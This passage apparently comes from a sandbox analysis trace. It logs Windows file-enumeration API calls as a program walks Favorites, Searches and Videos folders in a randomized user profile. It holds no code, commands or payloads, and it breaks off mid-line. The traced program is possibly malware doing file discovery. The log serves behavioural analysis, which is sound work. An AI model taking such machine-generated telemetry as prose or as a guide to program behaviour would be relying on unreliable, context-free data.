ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0041.342] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0041.342] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0041.342] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0041.342] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0041.342] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x34 [0041.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpFilePart=0x0) returned 0x35 [0041.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.345] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.345] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0041.345] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0041.346] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0041.346] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0041.346] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.346] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpFilePart=0x0) returned 0x34 [0041.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpFilePart=0x0) returned 0x35 [0041.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.348] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.348] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0041.348] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0041.348] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0041.349] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0041.349] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0041.349] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpFilePart=0x0) returned 0x26 [0041.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpFilePart=0x0) returned 0x27 [0041.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.350] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.350] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.351] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0041.351] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0041.351] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.351] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpFilePart=0x0) returned 0x26 [0041.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpFilePart=0x0) returned 0x27 [0041.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.352] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.352] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.352] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0041.352] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0041.353] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0041.353] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0041.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpFilePart=0x0) returned 0x25 [0041.353] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17f0dc40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17f0dc40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.353] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17f0dc40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17f0dc40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.354] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.354] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gPUcqx", cAlternateFileName="")) returned 1 [0041.354] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h6S9PxWHBy_gh7P", cAlternateFileName="H6S9PX~1")) returned 1 [0041.354] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qJcDr1", cAlternateFileName="")) returned 1 [0041.354] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qJcDr1", cAlternateFileName="")) returned 0 [0041.354] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0041.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 